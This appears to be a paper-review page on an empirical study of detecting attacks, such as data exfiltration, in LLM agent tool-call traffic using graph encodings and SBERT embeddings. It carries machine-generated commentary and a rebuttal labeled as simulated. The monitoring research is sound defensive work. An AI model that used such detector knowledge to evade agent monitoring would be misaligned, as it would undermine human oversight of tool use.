Content-Aware Attack Detection in LLM Agent Tool-Call Traffic: An Empirical Study of Features, Architectures, and Evaluation Protocols

Sultan Zavrak

arxiv: 2605.11053 · v3 · pith:C43N4527new · submitted 2026-05-11 · cs.CR · cs.AI · cs.LG


Pith reviewed 2026-05-25 05:55 UTC · model grok-4.3

classification cs.CR · cs.AI · cs.LG

keywords attack detection · LLM agents · tool calls · Model Context Protocol · content embeddings · SBERT · graph neural networks · evaluation protocols


The pith

Content embeddings drive attack detection in LLM agent tool-call traffic, with tree ensembles on SBERT features reaching 0.975 AUROC and outperforming GNNs and MLPs under task-stratified evaluation.

A machine-rendered reading of the paper's core claim, the machinery that carries it, and where it could break.

The paper evaluates detectors for attacks on Model Context Protocol sessions used by LLM agents to call external tools. Sessions are represented as graphs whose nodes carry sentence embeddings of arguments and responses, and multiple architectures are compared on two datasets using task-disjoint splits. Content embeddings prove essential, lifting AUROC from roughly 0.64 with metadata alone to above 0.89, while pooled SBERT features fed to tree ensembles achieve the highest score and render graph structure and neural layers largely unnecessary. The work also demonstrates that random splits can inflate reported performance by up to 26 points, establishing a stricter evaluation protocol.

Core claim

The detection signal resides primarily in the SBERT content embeddings: an AUROC of 0.975 was reached by tree ensembles on pooled embeddings, performing better than the neural architectures in the primary RAS-Eval setting including GNNs (0.917) and the MLP (0.896). Metadata-only baselines plateau around 0.64 regardless of model, and task-stratified splits are required to avoid memorization confounds that prior work overlooked.
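
The "pooled embeddings" in this claim can be pictured as one fixed-length vector per session, built from the per-node embeddings. The sketch below assumes mean pooling, which the summary does not confirm; the function name `mean_pool` and the toy 3-dimensional vectors are hypothetical stand-ins for real SBERT outputs.

```python
from typing import List, Sequence


def mean_pool(node_embeddings: Sequence[Sequence[float]]) -> List[float]:
    """Average per-node embedding vectors into one session-level vector.

    Mean pooling is an assumption made for illustration; the paper may use
    a different pooling operator.
    """
    if not node_embeddings:
        raise ValueError("session has no tool calls to pool")
    dim = len(node_embeddings[0])
    if any(len(vec) != dim for vec in node_embeddings):
        raise ValueError("all node embeddings must share one dimension")
    n = len(node_embeddings)
    return [sum(vec[i] for vec in node_embeddings) / n for i in range(dim)]


# Toy vectors standing in for sentence embeddings of two tool calls.
session = [[1.0, 0.0, 2.0], [3.0, 4.0, 0.0]]
pooled = mean_pool(session)
```

A vector like `pooled` is what a tree ensemble would consume as one row of its feature matrix, which is why no graph structure is needed at that stage.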

What carries the argument

Encoding each agent session as a graph (tool calls as nodes, sequential and data-flow links as edges) with nodes enriched by SBERT sentence-embedding features over arguments and responses, then classifying the resulting graphs or pooled embeddings.
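
The encoding described above can be sketched as follows. This is a minimal illustration, not the author's implementation: the `ToolCall` and `SessionGraph` types are hypothetical, and the data-flow rule (an earlier response reappearing verbatim in a later string argument) is an assumed heuristic chosen only to make the idea concrete.

```python
from dataclasses import dataclass, field
from typing import Any, Dict, List, Tuple


@dataclass
class ToolCall:
    tool: str
    arguments: Dict[str, Any]
    response: str


@dataclass
class SessionGraph:
    nodes: List[ToolCall] = field(default_factory=list)
    # Each edge is (source index, target index, edge kind).
    edges: List[Tuple[int, int, str]] = field(default_factory=list)


def encode_session(calls: List[ToolCall]) -> SessionGraph:
    """Build a graph with sequential edges and heuristic data-flow edges."""
    graph = SessionGraph(nodes=list(calls))
    for i, call in enumerate(calls):
        if i > 0:
            graph.edges.append((i - 1, i, "sequential"))
        # Assumed heuristic: link call j to call i when j's response text
        # appears verbatim inside one of i's string arguments.
        for j in range(i):
            resp = calls[j].response
            if resp and any(
                isinstance(v, str) and resp in v for v in call.arguments.values()
            ):
                graph.edges.append((j, i, "data_flow"))
    return graph


calls = [
    ToolCall("read_file", {"path": "notes.txt"}, "secret-token-123"),
    ToolCall("search", {"query": "weather"}, "sunny"),
    ToolCall("http_post", {"url": "https://example.invalid", "body": "secret-token-123"}, "ok"),
]
graph = encode_session(calls)
```

In this toy session the file contents flow from the first call into the body of the third, so the graph gains one data-flow edge in addition to the two sequential ones.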

If this is right

Content-level features are required to exceed 0.89 AUROC; metadata alone is insufficient.
Task-disjoint splits must be used, or reported AUROC can be inflated by up to 26 points.
Self-supervised pre-training confers no label-efficiency advantage on this detection task.
Graph neural networks and MLPs do not improve upon simple tree ensembles once content embeddings are provided.
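
The task-disjoint requirement in the list above can be made concrete with a small splitter that assigns whole tasks, rather than individual sessions, to train or test. This is a sketch under stated assumptions: the `task_id` field, the 25% test fraction, and the function name are hypothetical, and the paper's exact split procedure may differ.

```python
import random
from typing import Dict, List, Tuple

Session = Dict[str, object]


def task_disjoint_split(
    sessions: List[Session], test_fraction: float = 0.25, seed: int = 0
) -> Tuple[List[Session], List[Session]]:
    """Split sessions so that no task contributes to both train and test."""
    by_task: Dict[str, List[Session]] = {}
    for s in sessions:
        by_task.setdefault(str(s["task_id"]), []).append(s)
    task_ids = sorted(by_task)
    random.Random(seed).shuffle(task_ids)  # deterministic for a given seed
    n_test = max(1, round(len(task_ids) * test_fraction))
    test = [s for t in task_ids[:n_test] for s in by_task[t]]
    train = [s for t in task_ids[n_test:] for s in by_task[t]]
    return train, test


# Eight hypothetical tasks with three sessions each.
sessions = [{"task_id": f"task-{t}", "label": i % 2} for t in range(8) for i in range(3)]
train, test = task_disjoint_split(sessions)
```

A random split over `sessions` would instead scatter sessions of the same task across both sides, which is the memorization confound the paper reports.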

Where Pith is reading between the lines

These are editorial extensions of the paper, not claims the author makes directly.

Attack patterns in tool-call traffic may be captured by semantic content rather than call ordering or data-flow topology.
Deployment pipelines could favor lightweight tree models on pre-computed embeddings for lower latency and easier auditing.
The same content-embedding approach might transfer to detecting misuse in other structured agent interfaces beyond MCP.

Load-bearing premise

The RAS-Eval and ATBench datasets contain accurately labeled examples of benign and attacked MCP sessions that are representative of real deployment scenarios.

What would settle it

A new collection of MCP sessions with verified attack labels drawn from live agent deployments yields AUROC below 0.80 for the tree-ensemble model on pooled SBERT embeddings.
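
The falsification test above comes down to computing AUROC on fresh data and comparing it with 0.80. The sketch below computes AUROC as the fraction of (attacked, benign) pairs that the detector ranks correctly, counting ties as half. The labels and scores are invented toy values, not data from the paper, and the function name is hypothetical.

```python
from typing import Sequence


def auroc(labels: Sequence[int], scores: Sequence[float]) -> float:
    """Probability that a random attacked session outscores a random benign one."""
    pos = [s for y, s in zip(labels, scores) if y == 1]
    neg = [s for y, s in zip(labels, scores) if y == 0]
    if not pos or not neg:
        raise ValueError("AUROC needs at least one example of each class")
    wins = 0.0
    for p in pos:
        for n in neg:
            if p > n:
                wins += 1.0
            elif p == n:
                wins += 0.5  # ties count as half a correct ranking
    return wins / (len(pos) * len(neg))


# Toy data: 1 = attacked, 0 = benign; scores are detector outputs.
labels = [1, 1, 1, 0, 0, 0, 0]
scores = [0.9, 0.8, 0.3, 0.7, 0.2, 0.1, 0.4]
value = auroc(labels, scores)
claim_refuted = value < 0.80  # threshold taken from the criterion above
```

The pairwise form is quadratic in the number of sessions, which is fine for a sanity check; a rank-based implementation would be the usual choice at scale.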

Figures

Figures reproduced from arXiv: 2605.11053 by Sultan Zavrak.

**Figure 1.** Overview of the detection framework. MCP tool-call sessions are encoded …

**Figure 2.** Example MCP tool-call session showing a data exfiltration attack: the agent …

**Figure 3.** Session-to-graph encoding. Left: sequential tool calls. Right: the resulting …

**Figure 4.** Per-attack-category recall on the Combined dataset (GraphSAGE, content fea…

**Figure 5.** Label efficiency across datasets. Supervised training (circles) matches or per…

Original abstract

The Model Context Protocol (MCP) has become a widely adopted interface for LLM agents to invoke external tools, yet learned monitoring of MCP tool-call traffic remains underexplored. In this article, the proposed detector is presented as an attack detection framework for MCP tool-call traffic that encodes each agent session as a graph (tool calls as nodes, sequential and data-flow links as edges), enriches nodes with sentence-embedding features over arguments and responses, and classifies sessions as benign or attacked. Three GNN architectures (GAT, GCN, GraphSAGE), a no-graph MLP, and classical baselines (XGBoost, random forest, logistic regression, linear SVM) are evaluated, with the full architecture comparison conducted on RAS-Eval (task-stratified splits) and GraphSAGE retained as the GNN baseline on ATBench and a combined-source variant (both label-stratified). Three findings emerge. First, content-level features are essential: metadata-only detection plateaus around an AUROC of 0.64 regardless of architecture, while content embeddings push the AUROC above 0.89. Second, naive random-split evaluation inflates AUROC by up to 26 percentage points relative to task-disjoint splits, a memorization confound that prior agent-detection work has not addressed. Third, the detection signal resides primarily in the SBERT content embeddings: an AUROC of 0.975 was reached by tree ensembles on pooled embeddings, performing, for the most part, better than the neural architectures in the primary RAS-Eval setting including GNNs (0.917) and the MLP (0.896), and self-supervised pre-training does not deliver a label-efficiency advantage on this task.

Editorial analysis

A structured set of objections, weighed in public.

Desk editor's note, referee report, simulated authors' rebuttal, and a circularity audit. Tearing a paper down is the easy half of reading it; the pith above is the substance, this is the friction.

Desk Editor's Note (private letter to a colleague)

Content embeddings drive detection here and task-stratified splits expose a 26-point inflation that prior work ignored; tree models beat the GNNs on the main dataset.


The paper's core finding is that SBERT content embeddings carry most of the signal for spotting attacked MCP sessions: tree ensembles reach 0.975 AUROC on pooled features, while GNNs top out at 0.917 and the MLP at 0.896. Metadata alone stalls near 0.64 no matter the model. The paper also shows that random splits inflate AUROC by up to 26 points compared with task-disjoint splits on RAS-Eval, and that self-supervised pre-training adds no label-efficiency gain. The content-embedding result and the split inflation are the two points worth noting first.

The work is new in applying the split discipline to this domain and in documenting the architecture ranking under that discipline; earlier agent-detection papers apparently used the easier random splits without comment. It does a straightforward job of running the same data through GAT, GCN, GraphSAGE, an MLP, and several classical baselines, then repeating on ATBench and a combined set. The numbers are reported clearly enough to let a reader see the gap.

The soft spot is the datasets themselves. All claims rest on RAS-Eval and ATBench containing accurately labeled benign and attacked sessions that reflect real traffic. The abstract gives no detail on how labels were produced or validated, so any label noise or synthetic-attack artifacts that happen to align with SBERT features could change the ranking and the conclusion that content is essential. If the full methods section supplies independent checks on label quality, that concern shrinks; otherwise it stays material.

This paper is for people who build or evaluate monitors for LLM tool-calling interfaces. A reader who cares about evaluation hygiene in security ML will extract the split lesson even if they never use the specific models. The paper is coherent on its own terms and supplies falsifiable numbers, so it deserves a serious referee rather than a desk reject.

Referee Report

2 major / 1 minor

Summary. The paper presents an empirical study of attack detection for LLM agent tool-call traffic under the Model Context Protocol (MCP). Sessions are encoded as graphs (tool calls as nodes, sequential/data-flow edges) with nodes enriched by SBERT sentence embeddings of arguments and responses. It compares three GNNs (GAT, GCN, GraphSAGE), an MLP, and classical baselines (XGBoost, random forest, etc.) on the RAS-Eval dataset using task-stratified splits and on ATBench plus a combined variant using label-stratified splits. Key claims are that content embeddings are essential (AUROC >0.89 vs ~0.64 for metadata-only), random splits inflate performance by up to 26 points, and tree ensembles on pooled SBERT embeddings reach 0.975 AUROC, outperforming GNNs (0.917) and MLP (0.896) in the primary setting.

Significance. If the RAS-Eval and ATBench labels and attack instances are accurate and representative of deployment, the work would usefully demonstrate the dominance of content features over metadata, the necessity of task-disjoint evaluation to avoid memorization, and concrete performance benchmarks across architectures for MCP monitoring.

major comments (2)

[Methods / Dataset description] Dataset construction (Methods section): No description is provided of how labels for benign vs. attacked MCP sessions were generated or validated in RAS-Eval or ATBench, nor of the attack synthesis process. This is load-bearing for the central claim that content embeddings carry the primary detection signal (AUROC 0.975 for tree ensembles on pooled SBERT embeddings vs. 0.917 for GNNs and 0.896 for MLP), because all reported AUROCs and architecture rankings rest on the correctness and realism of these labels.
[Results / RAS-Eval evaluation] Results (architecture comparison): The claim that tree ensembles outperform the neural models is presented with specific AUROC numbers on RAS-Eval, but the text does not report statistical significance tests, standard deviations across multiple runs, or hyperparameter search details for the baselines. This weakens the strength of the conclusion that content embeddings make graph structure secondary.
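
The variance reporting requested in the second major comment could take a form like the sketch below, which summarizes per-seed AUROCs for two models and the paired gap between them. All numbers are invented placeholders and the names `model_a_runs` and `model_b_runs` are hypothetical; nothing here reproduces results from the paper.

```python
import statistics
from typing import List, Tuple


def summarize(runs: List[float]) -> Tuple[float, float]:
    """Return the mean and sample standard deviation of per-seed scores."""
    return statistics.mean(runs), statistics.stdev(runs)


# Placeholder AUROCs from five hypothetical seeds (NOT results from the paper).
model_a_runs = [0.90, 0.92, 0.91, 0.93, 0.89]
model_b_runs = [0.85, 0.88, 0.86, 0.87, 0.84]

a_mean, a_std = summarize(model_a_runs)
b_mean, b_std = summarize(model_b_runs)

# Pair runs by seed so that split-level noise cancels in the difference.
paired_gaps = [a - b for a, b in zip(model_a_runs, model_b_runs)]
gap_mean, gap_std = summarize(paired_gaps)
```

Reporting the paired gap alongside each model's own spread shows whether a ranking holds across seeds or only on average.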

minor comments (1)

[Abstract] The abstract states that self-supervised pre-training does not deliver a label-efficiency advantage, but the corresponding experiment (if present) should be explicitly referenced with a table or figure number for clarity.

Simulated Author's Rebuttal

2 responses · 0 unresolved

We appreciate the referee's detailed feedback on our manuscript. We address the major comments below and plan to incorporate revisions to improve the clarity and rigor of the paper.


Referee: [Methods / Dataset description] Dataset construction (Methods section): No description is provided of how labels for benign vs. attacked MCP sessions were generated or validated in RAS-Eval or ATBench, nor of the attack synthesis process. This is load-bearing for the central claim that content embeddings carry the primary detection signal (AUROC 0.975 for tree ensembles on pooled SBERT embeddings vs. 0.917 for GNNs and 0.896 for MLP), because all reported AUROCs and architecture rankings rest on the correctness and realism of these labels.

Authors: We agree with the referee that a detailed description of the dataset construction, including label generation, validation, and attack synthesis for RAS-Eval and ATBench, is essential for interpreting the results. In the revised manuscript, we will expand the Methods section to include this information, drawing from the original dataset papers and our synthesis process. This will provide the necessary transparency regarding the label quality and realism. revision: yes
Referee: [Results / RAS-Eval evaluation] Results (architecture comparison): The claim that tree ensembles outperform the neural models is presented with specific AUROC numbers on RAS-Eval, but the text does not report statistical significance tests, standard deviations across multiple runs, or hyperparameter search details for the baselines. This weakens the strength of the conclusion that content embeddings make graph structure secondary.

Authors: We acknowledge that the current manuscript does not include statistical significance tests, standard deviations from multiple runs, or detailed hyperparameter search procedures for the baselines. We will add these elements in the revision to strengthen the empirical claims. While the performance gaps are large, we agree that reporting variance and significance will better support the conclusion that the detection signal is primarily in the content embeddings rather than the graph structure. revision: yes

Circularity Check

0 steps flagged

No circularity: pure empirical comparison on fixed external datasets


The paper reports AUROC results from training and evaluating GNNs, MLPs, and tree ensembles on the RAS-Eval and ATBench datasets using SBERT embeddings and graph encodings. No equations, fitted parameters, or predictions are defined in terms of the target metrics; all numbers are direct experimental outputs. No self-citation chains, uniqueness theorems, or ansatzes are load-bearing. The work is self-contained against the stated benchmarks with no reduction of claims to inputs by construction.

Axiom & Free-Parameter Ledger

0 free parameters · 1 axioms · 0 invented entities

The paper is an empirical machine-learning study that introduces no new free parameters, theoretical axioms, or invented entities beyond standard supervised classification assumptions and existing embedding models.

axioms (1)

domain assumption: Ground-truth labels in RAS-Eval and ATBench correctly distinguish benign from attacked sessions.
All reported AUROC figures and architecture rankings depend directly on the accuracy of these labels.



Reference graph

Works this paper leans on

19 extracted references · 19 canonical work pages · 2 internal anchors

[1] GitHub topics: mcp-server, https://github.com/topics/mcp-server, accessed: 2026-05-03 (2026)

[2] Z. Wang, Y. Gao, Y. Wang, S. Liu, H. Sun, H. Cheng, G. Shi, H. Du, X. Li, MCPTox: A benchmark for tool poisoning attack on real-world MCP servers, arXiv preprint arXiv:2508.14925 (2025)

[3] X. Zong, Z. Shen, L. Wang, Y. Lan, C. Yang, MCP-SafetyBench: Safety evaluation for LLMs with real-world MCP servers, in: International Conference on Learning Representations (ICLR), 2026

[4] J. Kim, X. Liu, Z. Wang, S. Qiu, B. Li, W. Guo, D. Song, The attack and defense landscape of agentic AI: A comprehensive survey, arXiv preprint arXiv:2603.11088 (2026)

[5] G. Apruzzese, SoK: Reshaping research on network intrusion detection systems, arXiv preprint arXiv:2604.17556 (2026)

[6] J. Liu, B. Ruan, X. Yang, Z. Lin, Y. Liu, Y. Wang, T. Wei, Z. Liang, TraceAegis: Securing LLM-based agents via hierarchical and behavioral anomaly detection, arXiv preprint arXiv:2510.11203 (2025)

[7] Y. Liu, C. Zhang, Z. Han, H. Liu, Y. Wang, Y. Yu, X. Wang, Y. Yin, TrajAD: Trajectory anomaly detection for trustworthy LLM agents, arXiv preprint arXiv:2602.06443 (2026)

[8] Z. Wang, J. Zhang, G. Shi, H. Cheng, Y. Yao, K. Guo, H. Du, X. Li, MindGuard: Tracking, detecting, and attributing MCP tool poisoning attack via decision dependence graph, arXiv preprint arXiv:2508.20412 (2025)

[9] X. He, D. Wu, Y. Zhai, K. Sun, SentinelAgent: Graph-based anomaly detection in multi-agent systems, arXiv preprint arXiv:2505.24201 (2025)

[10] L. Advani, Trajectory guard – a lightweight, sequence-aware model for real-time anomaly detection in agentic AI, arXiv preprint arXiv:2601.00516 (2026)

[11] R. F. Del Rosario, Temporal attack pattern detection in multi-agent AI workflows: An open framework for training trace-based security models, arXiv preprint arXiv:2601.00848 (2025)

[12] D. Pathak, H. Kumar, A. Roy, F. George, M. Verma, P. Moogi, Detecting silent failures in multi-agentic AI trajectories, arXiv preprint arXiv:2511.04032 (2025)

[13] W. W. Lo, S. Layeghy, M. Sarhan, M. Gallagher, M. Portmann, E-GraphSAGE: A graph neural network based intrusion detection system for IoT, in: NOMS 2022–2022 IEEE/IFIP Network Operations and Management Symposium, IEEE, 2022

[14] F. Yang, J. Xu, C. Xiong, Z. Li, K. Zhang, PROGRAPHER: An anomaly detection system based on provenance graph embedding, in: Proceedings of the 32nd USENIX Security Symposium, 2023, pp. 4355–4372

[15] N. Reimers, I. Gurevych, Sentence-BERT: Sentence embeddings using siamese BERT-networks, in: Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing (EMNLP), 2019, pp. 3982–3992

[16] P. Veličković, G. Cucurull, A. Casanova, A. Romero, P. Liò, Y. Bengio, Graph attention networks, in: International Conference on Learning Representations, 2018

[17] M. Fey, J. E. Lenssen, Fast graph representation learning with PyTorch Geometric, in: ICLR Workshop on Representation Learning on Graphs and Manifolds, 2019

[18] Y. Fu, X. Yuan, D. Wang, RAS-Eval: A comprehensive benchmark for security evaluation of LLM agents in real-world environments, arXiv preprint arXiv:2506.15253 (2025)

[19] Y. Li, H. Luo, Y. Xie, Y. Fu, Z. Yang, S. Shao, Q. Ren, W. Qu, Y. Fu, Y. Yang, J. Shao, X. Hu, D. Liu, ATBench: A diverse and realistic agent trajectory benchmark for safety evaluation and diagnosis, arXiv preprint arXiv:2604.02022 (2026)
